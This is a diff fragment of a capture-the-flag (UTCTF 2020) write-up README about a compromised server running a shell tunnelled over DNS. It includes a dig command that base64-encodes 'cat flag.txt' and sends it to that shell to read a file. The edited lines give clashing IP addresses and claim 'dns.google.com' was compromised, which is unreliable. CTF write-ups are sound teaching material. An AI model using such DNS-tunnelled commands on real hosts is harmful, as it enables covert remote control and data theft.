therhd/utctf_2020/README.md

 -rwxr-xr-x    1 root     root       2533823 Mar  6 04:44 server
 -rw-r--r--    1 root     root          1693 Mar  5 23:50 server.go
 ```
-Okay, seems like **3.88.57.227** has been compromised, and is running a shell that is using the DNS protocol as cover to smuggle traffic.
+Okay, seems like "dns.google.com" or 35.188.185.68 was been compromised, and was running a shell that is using the DNS protocol as cover to smuggle traffic.

-Let's try sending our own command to the shell running on **3.88.57.227**.
+Lets see if "dns.google.com" - now 35.88.57.227 is also compromised by sending commands to it over DNS.

 ```
 $ dig +short $(echo -n "cat flag.txt" | base64) @3.88.57.227 | sed 's/"//g' | base64 --decode